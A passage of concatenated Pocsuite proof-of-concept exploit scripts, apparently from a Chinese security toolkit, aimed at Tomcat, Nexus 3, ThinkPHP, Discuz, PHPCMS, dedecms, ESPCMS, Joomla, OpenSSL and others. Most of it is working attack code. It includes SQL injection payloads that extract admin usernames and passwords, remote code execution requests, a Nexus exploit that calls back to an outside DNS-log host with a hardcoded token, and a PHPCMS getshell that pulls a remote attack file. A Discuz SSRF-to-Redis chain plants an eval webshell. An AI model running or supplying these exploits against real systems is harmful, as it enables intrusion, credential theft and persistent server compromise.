    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #指纹方法
    def _fingerprint(self):
        pass


    def _verify(self):
        #ip = self.url.split(':')[1].replace('/', '')
        #import psycopg2
        testurl = (self.url+'/myfile.jsp/').replace('//m','/m')
        testdata = """<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>"""
        result={}
        output = Output(self)
        message = ''

        print (testurl)
        try:
            r1 = req.put(testurl, testdata,timeout = 3)#3秒超时

            r2 = req.get(testurl.replace(".jsp/",".jsp"))

            print ('响应包长度：')
            print (r2.content.__len__())

            if  r2.content.find('successfully.') > 0:

                message = testurl + 'Tomcat uploadfile vulnerability'
                print(message)

                result['VerifyInfo'] = {}

                result['VerifyInfo']['url'] = testurl
                result['VerifyInfo']['Payload'] = testdata

                print('%s is vulnerable!' % testurl)
                return True
            else:
                print('没有发现关键字：successfully. ')
                return False

        except Exception as e:
            print('连接失败')
            pass

        return self.save_output(result)


    #攻击模块
    def _attack(self):
        pass

    #输出报告
    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


#注册类
register(TomcatuploadPOC)


#!/usr/bin/env python
#coding=utf-8

import random
import json
from string import ascii_letters
import time
import traceback

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
 

'''
CVE-2019-7238
这个漏洞需要有Nexus有assets才能触发
'''
class Nexus3_2019_7238_POC(POCBase):
    vulID = 'Nexus3-CVE-2019-7238'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    vulDate = '2019-02-05'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-02-20'  # 编写 PoC 的日期
    updateDate = '2020-04-09'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/P1KC7wadbEZbHvavYQjbVA']  # 漏洞地址来源,0day不用写
    name = 'Nexus3 未授权RCE'  # PoC 名称
    appPowerLink = ['https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019']  # 漏洞厂商主页地址
    appName = 'Nexus Repository Manager 3'  # 漏洞应用名称
    appVersion = 'Nexus 3 < 3.15.0'  # 漏洞影响版本
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
        Nexus Repository Manager 3 未授权 RCE
    '''  # 漏洞简要描述
    cvss = u"高危"  # 严重,高危,中危,低危

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    
    def _verify(self, cmd='ping {0}.{1}'.format(BANNER, DOMAIN)):
        
        result={}

        vul_url = self.url
        
        target_url = vul_url + "/service/extdirect"

        headers = {'Referer':''}

        j = {"action":"coreui_Component",
                "method":"previewAssets",
                "data":[{"page":1,"start":0,"limit":25,"filter":
                    [{"property":"repositoryName","value":"*"},
                        {"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('{0}')".format(cmd)},
                        {"property":"type","value":"jexl"}]}],
                "type":"rpc","tid":4}
        
        try:
            resp = req.post(target_url, json=j, headers=headers)#, proxies={'http': 'http://127.0.0.1:8087'})
        except Exception as e:
            print(e)
            raise e
        
        time.sleep(2) # 休眠2s等待dnslog生成记录

        if self.dnslog_sucess(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            result['VerifyInfo']['Payload'] = j
            return self.save_output(result)
        return self.save_output(result)


    # 验证DNS已被解析，命令执行
    def dnslog_sucess(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            sub_domain = d['data'][0]['domain']
            if self.BANNER in sub_domain:
                print(sub_domain)
                return True
        except Exception:
            return False            


    # 攻击模块
    def _attack(self):
        return self._verify("calc")


    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

# 注册类
register_poc(Nexus3_2019_7238_POC)



#!/usr/bin/env python
#!coding: utf-8
import re

from pocsuite.net import req
from pocsuite.poc import POCBase,Output
from pocsuite.utils import register

class Fuckdede(POCBase):
	vulID='1'
	version = '1'
	author = ['fengxuan']
	vulDate = '2016-2-20'
	createDate = '2016-2-20'
	updateDate = '2016-2-20'
	references = ['http://www.evalshell.com', 'http://www.cnseay.com/3714/']
	name = 'dedecms plus/recommend.php 注入漏洞利用EXP'
	appPowerLink = 'http://www.dedecms.cn/'
	appName = 'dedecms'
	appVersion = '5.7'
	vulType = 'SQL Injection'
	desc = '''
           开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量，使其他变量直接
           带入了SQL语句中，可以通过\字符来转义掉一个单引号，逃逸单引号，产生SQL注入。
           此注入为报错注入，可以通过UpdateXML函数进行注入。
    '''
	samples = ['']

	def _verify(self):
		result = {}
		target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
		response = req.get(target)
		content = response.content
		regex = re.compile('<h2>.*?\|(.*?)</h2>')
		data = regex.search(content)
		if data != None:
			result = {'VerifyInfo':{}}
			result['VerifyInfo']['URL'] = self.url
		return self.parse_result(result)

	def _attack(self):
		result = {}
		target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
		response = req.get(target)
		content = response.content
		regex = re.compile('<h2>.*?\|(.*?)</h2>')
		data = regex.search(content)
		if data != None:
			string = data.groups()
			result = {'VerifyInfo':{}}
			result['VerifyInfo']['URL'] = self.url
			result['VerifyInfo']['data'] = string
		return self.parse_result(result)

	def parse_result(self, result):
		output = Output(self)

		if result:
			output.success(result)
		else:
			output.fail("Internet Nothing returned")
		return output

register(Fuckdede)











#!/usr/bin/python
# -*- coding: utf-8 -*-


from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class AxublogPOC(POCBase):
    name = 'axublog'
    vulID = '0'  # https://www.seebug.org/vuldb/ssvid-78176
    author = ['bey0nd']
    vulType = 'SQLI'
    version = '1.0.6'    # default version: 1.0
    references = ['']
    desc = '''axublog1.0.6 sqli'''

    vulDate = '2018-01-10'
    createDate = '2018-01-10'
    updateDate = '2018-01-10'

    appName = 'axublog'
    appVersion = 'axublog'
    appPowerLink = 'axublog'
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        payurl = "hit.php?g=arthit&id=-1 +%55NION+ALL+%53ELECT+1,2,3,4,5,6,md5(1),8,9,10,11,12 from axublog_adusers"
        resp = req.get(self.url + payurl)
        if resp and resp.text and resp.status_code == 200:
            if "c4ca4238a0b923820dcc509a6f75849b" in resp.text:
                result['AdminInfo'] = {}
                result['AdminInfo']['Password'] = "c4ca4238a0b923820dcc509a6f75849b"
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Failed')
        return output

register(AxublogPOC)



#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '62274'  # ssvid
    version = '1'
    author = ['Medici.Yan']
    vulDate = '2011-11-21'
    createDate = '2015-09-23'
    updateDate = '2015-09-23'
    references = ['http://www.seebug.org/vuldb/ssvid-62274']
    name = '_62274_phpcms_2008_place_sql_inj_PoC'
    appPowerLink = 'http://www.phpcms.cn'
    appName = 'PHPCMS'
    appVersion = '2008'
    vulType = 'SQL Injection'
    desc = '''
        phpcms 2008 中广告模块，存在参数过滤不严，
        导致了sql注入漏洞，如果对方服务器开启了错误显示，可直接利用，
        如果关闭了错误显示，可以采用基于时间和错误的盲注
    '''
    samples = ['http://10.1.200.28/']

    def _attack(self):
        result = {}
        vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
        payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
        head = {
            'Referer': payload
        }
        resp = req.get(vulurl, headers=head)
        if resp.status_code == 200:
            match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
            if match_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result.group(1)
                result['AdminInfo']['Password'] = match_result.group(2)
        return self.parse_attack(result)

    def _verify(self):
        result = {}
        vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
        payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
        head = {
            'Referer': payload
        }
        resp = req.get(vulurl, headers=head)
        if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/python
# -*- coding: utf-8 -*-

import string
import time
from pocsuite.api.request import req #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.utils import randomStr


class TestPOC(POCBase):
    name = 'Thinkphp5 5.0.22/5.1.29 Remote Code Execution'
    vulID = '2'  # https://www.seebug.org/vuldb/ssvid-93077
    author = ['liujun']
    vulType = 'cmd-exec'
    version = '1.0'    # default version: 1.0
    references = ['https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce']
    desc = '''Thinkphp5 5.0.22/5.1.29 Remote Code Execution'''

    vulDate = '2018-12-10'
    createDate = '2019-03-23'
    updateDate = '2019-03-23'

    appName = 'Thinkphp'
    appVersion = '5.X'
    appPowerLink = 'http://www.thinkphp.cn/'
    samples = ['']


    def _attack(self):
        """attack mode"""
        return self._verify()

    def _verify(self):
        """verify mode"""
        result = {}
        self.url = self.url + '''/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1'''
        print self.url
        matchstring = 'phpinfo()'

        resp = req.get(self.url)

        if matchstring in resp.content.lower():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '1'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2015-08-29'
    createDate = '2016-01-15'
    updateDate = '2016-01-15'
    references = ['http://www.sebug.net/vuldb/ssvid-']
    name = 'joomla! 组件GoogleSearch (CSE) V3.0.2 参数q  XSS漏洞'
    appPowerLink = 'http://www.kksou.com'
    appName = 'joomla!'
    appVersion = '3.0.2'
    vulType = 'XSS漏洞'
    desc = '''
        joomla! 组件GoogleSearch (CSE)的3.0.2版本的参数q由于过滤不严，导致存在反射型XSS漏洞。
        远程攻击者可以利用该漏洞执行html代码。该漏洞验证的POC如下所示：
        http://XXX/index.php?option=com_googlesearch_cse&n=30&Itemid=97&q="><img+src=x+onerror=alert(/<0x!!qaz_*/)>
        验证的截图如下：http://pan.baidu.com/s/1i4tiZE9
    '''
    samples = ['http://ufoforce.com']

    def _attack(self):
        return self._verify()

    def _verify(self):
        #验证XSS漏洞
        result = {}
        #特征字符串
        pars='<0x!!qaz_*'
        #验证的payload
        payload='"><img+src=x+onerror=alert(/'+pars+'/)>'
        #漏洞连接
        exploit='/index.php?option=com_googlesearch_cse&n=30&Itemid=97&q='
        #构造访问地址
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #访问
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查
        if pars in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
import urlparse

class TestPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['Gump']
    vulDate = '2015-12-27'
    createDate = '2016-01-29'
    updateDate = '2016-01-29'
    references = ['http://www.wooyun.org/bugs/wooyun-2015-0163605']
    name = 'ESPCMS V6.6.15.12.09 adminsoft\control\citylist.php SQL注入 POC'
    appPowerLink = 'http://www.ecisp.cn/'
    appName = 'ESPCMS'
    appVersion = 'V6.6.15.12.09'
    vulType = 'SQL Injection'
    desc = '''
    ESPCMS V6.6.15.12.09在adminsoft\control\citylist.php对参数处理不当导致SQL注入,需要后台其他管理员权限登录
    '''
    samples = ['']
    # 组件下载地址http://www.ecisp.cn/html/cn/download/

    # 需要后台登录Cookie，可用其他普通管理员账户登录
    def check_argv(self):
        logger.log(CUSTOM_LOGGING.WARNING,u"注意，需要后台登录后的cookie")
        if self.headers['Cookie']:
            # 同时自动设置好User-Agent
            self.headers['User-agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36"
            logger.log(CUSTOM_LOGGING.WARNING,u"请确保cookie正确")
            return True
        else:
            logger.log(CUSTOM_LOGGING.WARNING,u"请提交后台登录后的cookie")
            return False

    def _attack(self):
        if self.check_argv():
            result = {}
            payload = "?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(char(45,45,45),name,char(45,45,45),password,char(45,45,45)),4,5 FROM espcms_v6.espcms_admin_member"
            vulurl = urlparse.urljoin(self.url,'adminsoft/index.php' + payload)
            resp = req.get(vulurl)
            if resp.status_code == 200:
                # 匹配账户密码
                match_result = re.search(r'---(.+)---(.+)---',resp.content,re.I | re.M)
                if match_result:
                    result['AdminInfo'] = {}
                    result['AdminInfo']['Username'] = match_result.group(1)
                    result['AdminInfo']['Password'] = match_result.group(2)
            return self.parse_attack(result)

    def _verify(self):
        if self.check_argv():
            result = {}
            payload = "?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(floor(rand(0)*2),md5(1)),4,5"
            vulurl = urlparse.urljoin(self.url,'adminsoft/index.php' + payload)
            resp = req.get(vulurl)
            if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'adminsoft/index.php')
                result['VerifyInfo']['Payload'] = payload
            return self.parse_attack(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output
from pocsuite.api.poc import POCBase
from pocsuite.api.utils import randomStr
import re

class phpcms_getshll(POCBase):
    vulID = '92930'  # vul ID
    version = '1'
    author = 'Xiaofu'
    vulDate = '2017-04-10'
    createDate = '2017-04-14'
    updateDate = '2017-04-14'
    references = ['https://www.seebug.org/vuldb/ssvid-92930']
    name = 'PHPCMS 9.6 getshell'
    appPowerLink = 'http://www.phpcms.cn'
    appName = 'phpcms'
    appVersion = '9.6.0'
    vulType = 'Getshell'
    desc = '''
        PHPCMS在注册页面存在上传漏洞，
        可通过构造info[content]参数，
        以文件包含的方式上传webshell。
    '''
    samples = []

    def _verify(self):
        result = {}
        url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
        username = randomStr(6)
        password = randomStr(6,'1234567890')
        data = {
            "siteid": "1",
            "modelid": "1",
            "username": "%s"%(username),
            "password": "%s"%(password),
            "email": "%s@qq.com"%(username),
            "info[content]": "<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ",
            "dosubmit": "1",
            "protocol": "",
        }
        match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
        resp = req.post(url, data=data)
        shell = re.findall(match,resp.text)
        shellinfo = ''.join(shell[0]) + ".php"
        if shell:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            shell_resp = req.get(shellinfo)
            if shell_resp.status_code == 200:
                result['VerifyInfo']['webshell'] = shellinfo
        return self.parse_attack(result)

    _attack = _verify

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

    def _attack(self):
        return self._verify()


register(phpcms_getshll)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
 
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

import time
import struct
import select
import socket


from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = [
    # TLSv1.1 Record Layer : HandshakeProtocol: Client Hello
    "16"  # Content Type: Handshake (22)
    "0302"  # Version: TLS 1.1 (0x0302)
    "00dc"  # Length: 220
    # Handshake Protocol: Client Hello
    "01"  # Handshake Type: Client Hello (1)
    "0000 d8"  # Length (216)
    "0302"  # Version: TLS 1.1 (0x0302)
    # Random
    "5343 5b 90"  # gmt_unix_time
    "9d9b 72 0b bc  0c bc 2b 92 a8 48 97 cf bd39 04 cc 16 0a 85 03  90 9f 77 04 33 d4de"  # random_bytes
    "00"  # Session ID Length: 0
    "0066"  # Cipher Suite Length: 102
    # Cipher Suites
    "c014"
    "c00a"
    "c022"
    "c021"
    "0039"
    "0038"
    "0088"
    "0087"
    "c00f"
    "c005"
    "0035"
    "0084"
    "c012"
    "c008"
    "c01c"
    "c01b"
    "0016"
    "0013"
    "c00d"
    "c003"
    "000a"
    "c013"
    "c009"
    "c01f"
    "c01e"
    "0033"
    "0032"
    "009a"
    "0099"
    "0045"
    "0044"
    "c00e"
    "c004"
    "002f"
    "0096"
    "0041"
    "c011"
    "c007"
    "c00c"
    "c002"
    "0005"
    "0004"
    "0015"
    "0012"
    "0009"
    "0014"
    "0011"
    "0008"
    "0006"
    "0003"
    "00ff"
    "01"  # Compression Methods
    # Compression Methods (1 method)
    "00"  # Compression Method: null
    "0049"  # Extension Length: 73
    "000b"  # Type: ec_point_formats
    "0004"  # Length: 4
    "03"  # EC point formats length: 3
    # Elliptic curves point formats
    "00"  # EC point format: uncompressed (0)
    "01"  # EC point format:ansix962_compressed_prime
    "02"  # EC point format:ansix962_compressed_char2
    # Extension: elliptic_curves
    "000a"
    "0034"
    "0032"
    "000e"
    "000d"
    "0019"
    "000b"
    "000c"
    "0018"
    "0009"
    "000a"
    "0016"
    "0017"
    "0008"
    "0006"
    "0007"
    "0014"
    "0015"
    "0004"
    "0005"
    "0012"
    "0013"
    "0001"
    "0002"
    "0003"
    "000f"
    "0010"
    "0011"
    "0023 00 00"  # Extension:SeesionTicket TLS
    "000f 00 01 01"  # Extension:Heartbeat
]

# ---------TLSv1---[Heartbeat Request]------------
hb = [
            # TLSv1.1 Record Layer: HeartbeatRequest
    "18"    # Content Type: Heartbeat (24) ----(0x18)
    "0302"  # Version: TLS 1.1 (0x0302)
    "0003"  # Heartbeat Message:
    "01"    # Type: Request (1) (0x01)
    "2000"  # Payload Length: (16384) (0x4000)
]

hello = hello[0].replace("", "").replace("\n", "")
hb = hb[0].replace("", "").replace("\n", "")

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b: b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin)
        # print ' %04x: %-48s %s' % (b, hxdat, pdat)

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        # print 'read: ', r
        if s in r:
            data = s.recv(remain)

            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    hexdump(rdata)
    return rdata

def recvmsg(s):
    hdr = recvall(s, 5)  # recvall(s, 5, timeout=5)
    if hdr is None:
        return None, None, None
    # C     ---- [big-edition] + [unsigned char] + [unsigned short] + [unsigned short]
    # Python ---- [big-edition] + integer +integer + integer
    # [Content Type] + [Version] + [Length]
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        return None, None, None
    return typ, ver, pay

def hit_hb(s, target):
# global target
    s.send(h2bin(hb))
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            return False

        # TLSv1.1 Record Layer: EncryptedHeartbeat
        # Content Type: Heartbeat (24)
        # Version: TLS 1.1 (0x0302)
        # Length: 19
        # Encrypted Heartbeat Message
        if typ == 24:
            if len(pay) > 3:
                return "check"
            else:
                return True
        if typ == 21:
            return False

def ssltest(target, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(h2bin(hello))

    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            return
        # Look for server hello done message.
        # typ == 22 ----> Handshake
        #
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    # sys.stdout.flush()
    # print "[+] send payload: %s" % hb
    s.send(h2bin(hb))  # Malformed Packet
    return hit_hb(s, target)  # ------------- ********* 
 
class OpensslPOC(POCBase):
    vulID = '20'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2014-04-01' #漏洞公开的时间,不知道就写今天
 
    author = 'b0b@c' #  PoC作者的大名
    createDate = '2017-12-12'# 编写 PoC 的日期
    updateDate = '2017-12-12'# PoC 更新的时间,默认和编写时间一样
    references = 'https://www.cnblogs.com/KevinGeorge/p/8029947.html'# 漏洞地址来源,0day不用写
    name = 'opssl Heart-Blood'# PoC 名称
    appPowerLink = 'https://www.openssl.org/'# 漏洞厂商主页地址
    appName = 'openSSL'# 漏洞应用名称
    appVersion = '1.0.1'# 漏洞影响版本
    vulType = 'weak-pass'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        openSSL心脏滴血漏洞
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"中危" #严重,高危,中危,低危
 
    #验证漏洞 pocsuite -r 20-openssl-access.py -u 10.1.5.26 --verify
    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url
 
        #如果设置端口则取端口,没有设置则为默认端口
        import re
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else :
            _host = url2ip(vul_url)
            _port = 443
 
        #s = socket.socket()
        #socket.setdefaulttimeout(1)
        #检测漏洞
        try:
            ret = ssltest(_host,_port)
            # print ret
            if ret == "check":
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = host
                result['VerifyInfo']['Payload'] = payload
            else:
                pass
        except:
            pass
        print('[+]20 poc done')
        return self.save_output(result)
 
    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()
 
    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output
 
register(OpensslPOC)




#!/usr/bin/env python
# coding: utf-8
import re
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = ''  # ssvid
    version = ' '
    author = ['']
    vulDate = ''
    createDate = '2016-09-19'
    updateDate = '2016-09-19'
    references = ['http://wooyun.org/bugs/wooyun-2015-0105242']
    name = 'bookingecms_rewrite_sql 注入漏洞'
    appPowerLink = ''
    appName = 'bookingecms'
    appVersion = ''
    vulType = ''
    desc = '''
    bookingecms_rewrite_sql 注入漏洞
    '''
    samples = ['']
    install_requires = ['']
    

    def _attack(self):
        result = {}
        self._verify()

    def _verify(self):
        result = {}
        vulurl = "%s/?m=hotel.getHotelInfo" % self.url
        payload = {"hotelId":"11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(MD5(3.14) AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"}
        resp = req.post(vulurl,data = payload,timeout =15)
        re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
        if re_result:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# code:utf-8

import string
import random
import hashlib
import base64
import urlparse

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '91879'  # ssvid
    version = 'beta'
    author = ['C1tas']
    vulDate = '2016-06-17'
    createDate = '2016-06-23'
    updateDate = '2016-06-23'
    references = ['https://www.seebug.org/vuldb/ssvid-91879']
    name = 'Discuz!SSRF_Redis_Code Execution'
    appPowerLink = 'http://www.discuz.net'
    appName = 'Discuz!'
    appVersion = '3.2X'
    vulType = 'Code Execution'
    desc = '''
        Discuz!SSRF_Redis_Code Execution
    '''
    samples = ['']
    install_requires = ['']
    

    def _attack(self):
        result = {}
        ###
        #!!!!The ssrf_url is one file i put it in discuz for test.
        #!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well;
        ###
        ssrf_url = "ssrf_gopher.php?ssrf="
        payload = ('gopher://127.0.0.1:6379/'\
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'\
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
                   'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
                   ' end;return 1;" 0 %250D%250Aquit')
        #
        tmpparse = urlparse.urlparse(self.url)
        if tmpparse.path != '':    
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
            #self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path]
        else:
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc
        
        vul_url = self.url + '/' + ssrf_url + payload

        base_rep = req.get(vul_url)
        while base_rep.status_code == 200:
            shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(shell_url)
            
            if rep.status_code == 200:
                shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[c1tas]);?>");phpinfo();'
                shell_payload_b64 = base64.b64encode(shell_payload)
                
                attack_url= shell_url + '&a=' + shell_payload_b64
                
                req.get(attack_url)
                
                flag = "phpinfo";
                shell_url = self.url + '/' + 'shell.php'
                verify_url = shell_url + "?c1tas=phpinfo();"
                rep = req.get(verify_url)
                if rep.status_code == 200 and flag in rep.content:
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = shell_url
                    result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'

                
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + '/' +ssrf_url +payload_flush
                req.get(recover_url)
                req.get(self.url + '/forum.php')

                break


        return self.parse_output(result)

    def _verify(self):
        ###
        #!!!!The ssrf_url is one file i put it in discuz for test.
        #!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well;
        ###
